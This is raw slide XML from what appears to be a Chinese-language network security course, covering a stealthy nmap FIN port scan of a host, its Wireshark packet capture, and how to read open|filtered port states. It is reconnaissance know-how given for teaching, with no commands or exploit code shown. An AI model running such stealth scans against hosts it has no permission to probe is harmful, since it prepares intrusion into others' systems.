                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="文本框 106"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213985" y="956310"/>
            <a:ext cx="5276850" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.回到Wireshark工具查看nmap发送的数据包，发送了许多含有FIN标志的数据包，如图2-2-50所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213985" y="1878330"/>
            <a:ext cx="5276850" cy="3714750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5213985" y="5593080"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-50 nmap发送的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用nmap工具进行隐蔽的主机端口扫描并分析</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤七</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>07</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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6" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 端口扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="文本框 107"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683885" y="1053148"/>
            <a:ext cx="5080000" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.从扫描结果可以看出扫描出的21、22、80等多个端口都是open|filtered 状态。根据RFC 793规定，这些端口是开放的但nmap无法根据open|filtered标识来区别端口处于open状态还是filtered状态。这种状态出现在像open端口对报文不做回应的FIN 扫描类型中。5.打开终端的Wireshark工具对本地网卡进行监听，如图2-2-51所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683885" y="3360102"/>
            <a:ext cx="5276850" cy="1714500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="文本框 108"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5683885" y="5074602"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
